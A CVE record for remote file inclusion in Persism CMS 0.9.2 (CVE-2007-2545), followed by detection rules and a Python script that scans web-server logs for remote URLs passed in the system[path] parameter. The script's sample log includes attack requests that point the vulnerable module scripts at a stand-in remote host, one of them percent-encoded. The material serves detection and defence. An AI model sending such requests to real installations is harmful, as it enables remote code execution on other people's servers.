CVE-2007-2545
published 2007-05-09


Priority: P260high
CVSS 2.0: 7.5 (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 68.75% (99.3rd percentile)
Multiple PHP remote file inclusion vulnerabilities in Persism CMS 0.9.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the system[path] parameter to (1) blocks/headerfile.php, (2) files/blocks/latest_files.php, (3) filters/headerfile.php, (4) forums/blocks/latest_posts.php, (5) groups/headerfile.php, (6) links/blocks/links.php, (7) menu/headerfile.php, (8) news/blocks/latest_news.php, (9) settings/headerfile.php, or (10) users/headerfile.php, in modules/.

Affected (1 range)

Vendor        Product       Version range   Fixed in
persism_cms   persism_cms   <= 0.9.2        (none listed)

Detection & IOCs (extracted from sources)

Paths:
  /modules/blocks/headerfile.php
  /modules/files/blocks/latest_files.php
  /modules/filters/headerfile.php
  /modules/forums/blocks/latest_posts.php
  /modules/groups/headerfile.php
  /modules/links/blocks/links.php
  /modules/menu/headerfile.php
  /modules/news/blocks/latest_news.php
  /modules/settings/headerfile.php
  /modules/users/headerfile.php
  • Detect HTTP requests targeting any of the vulnerable PHP scripts with a user-supplied URL in the system[path] parameter, indicating a remote file inclusion attempt.
  • Monitor web server logs for GET/POST requests containing 'system[path]=' with an http:// or https:// value (remote URL) directed at any script under the /modules/ directory tree.
  • Exploitation requires the PHP 'allow_url_include' (or 'allow_url_fopen') directive to be enabled on the target server; installations with these disabled are not exploitable via this RFI vector.
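The two log-monitoring rules above, implemented as an added example that is not part of this record or of Persism CMS: it parses Common/Combined Log Format access-log lines (a constructed sample is embedded), flags any request to a script under /modules/ whose system[path] query parameter carries an http:// or https:// URL, and marks whether the script is one of the ten listed in the CVE. It only sees query strings, so POST bodies are out of scope unless the server logs them; the log lines, client addresses and remote URLs are constructed and use documentation ranges.

```python
"""Flag remote-file-inclusion attempts against Persism CMS /modules/ scripts
in web-server access logs (CVE-2007-2545 detection rules as code)."""
import re
from urllib.parse import urlsplit, parse_qs

# The ten module scripts named in the CVE description.
VULNERABLE_SCRIPTS = (
    "/modules/blocks/headerfile.php",
    "/modules/files/blocks/latest_files.php",
    "/modules/filters/headerfile.php",
    "/modules/forums/blocks/latest_posts.php",
    "/modules/groups/headerfile.php",
    "/modules/links/blocks/links.php",
    "/modules/menu/headerfile.php",
    "/modules/news/blocks/latest_news.php",
    "/modules/settings/headerfile.php",
    "/modules/users/headerfile.php",
)

# Common/Combined Log Format prefix: client ident user [timestamp] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Rule 2 of the record: only http:// and https:// values count as remote URLs.
REMOTE_URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def rfi_url(target):
    """Return the remote URL given in system[path] when `target` is a request to a
    script under /modules/ carrying one; otherwise return None."""
    parts = urlsplit(target)
    if "/modules/" not in parts.path:
        return None
    # parse_qs percent-decodes keys, so an encoded system%5Bpath%5D is matched too.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("system[path]", []):
        if REMOTE_URL_RE.match(value):
            return value
    return None


def is_known_script(path):
    """True when the request path ends in one of the ten scripts from the CVE;
    endswith() tolerates the CMS living under a prefix such as /cms/modules/."""
    return any(path.endswith(script) for script in VULNERABLE_SCRIPTS)


def scan_log(lines):
    """Parse access-log lines and return one finding per RFI-looking request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than crash on junk
        url = rfi_url(m["target"])
        if url is None:
            continue
        path = urlsplit(m["target"]).path
        hits.append({
            "ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "status": m["status"], "script": path,
            "remote_url": url, "known_script": is_known_script(path),
        })
    return hits


# Constructed sample log: two benign requests, two hits on listed scripts
# (one with a percent-encoded parameter name), one hit on another /modules/ script.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/May/2007:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/May/2007:10:01:15 +0000] "GET /modules/menu/headerfile.php?system[path]=/var/www/persism HTTP/1.1" 200 880',
    '203.0.113.9 - - [09/May/2007:10:02:40 +0000] "GET /modules/news/blocks/latest_news.php?system[path]=http://203.0.113.9/inc.txt HTTP/1.1" 200 412',
    '203.0.113.9 - - [09/May/2007:10:02:41 +0000] "GET /cms/modules/users/headerfile.php?system%5Bpath%5D=https%3A%2F%2F203.0.113.9%2Finc.txt HTTP/1.1" 200 412',
    '203.0.113.9 - - [09/May/2007:10:02:42 +0000] "GET /modules/other/thing.php?system[path]=http://203.0.113.9/inc.txt HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        tag = "listed script" if hit["known_script"] else "other /modules/ script"
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["script"]} '
              f'-> {hit["remote_url"]} [{tag}, HTTP {hit["status"]}]')
```

A finding is an attempt, not proof of code execution: per the third rule above, the host is only exploitable this way if allow_url_include (or allow_url_fopen) is on, so pair a hit with a check of the server's php.ini before treating it as an incident. A request with a local path in system[path] (second sample line) is deliberately not flagged, since the record describes the remote-URL vector.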